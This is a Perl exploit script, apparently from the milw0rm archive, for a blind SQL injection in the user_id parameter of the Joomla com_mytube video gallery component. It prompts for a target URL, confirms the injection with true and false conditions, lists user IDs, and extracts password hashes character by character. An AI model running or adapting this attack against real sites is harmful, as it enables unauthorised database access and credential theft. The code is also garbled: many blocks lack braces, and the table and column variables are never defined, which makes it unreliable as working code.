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Joomla com_mytube (user_id) Blind SQL Injection Exploit

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#!/usr/bin/perl -w

#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote

#Affected software description:

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.


#I.Blind SQL injection (user_id)
#X: Valid User_id

#[!] Produced in South America

use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";

print "[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);

$w="Total Videos In Category";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";

$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo \n";}


{print " [-] Vulnerable \n";


for ($idusuario=62;$idusuario<=80;$idusuario++)


$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}


print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);

for ($x=1;$x<=32;$x++)

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
if ($content =~ /$regexp/)

for ($c=97;$c<=102;$c++)

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}


for ($c=48;$c<=57;$c++)

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}



print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";



{print " [-] Exploit Fallo \n";}

# milw0rm.com [2009-09-21]

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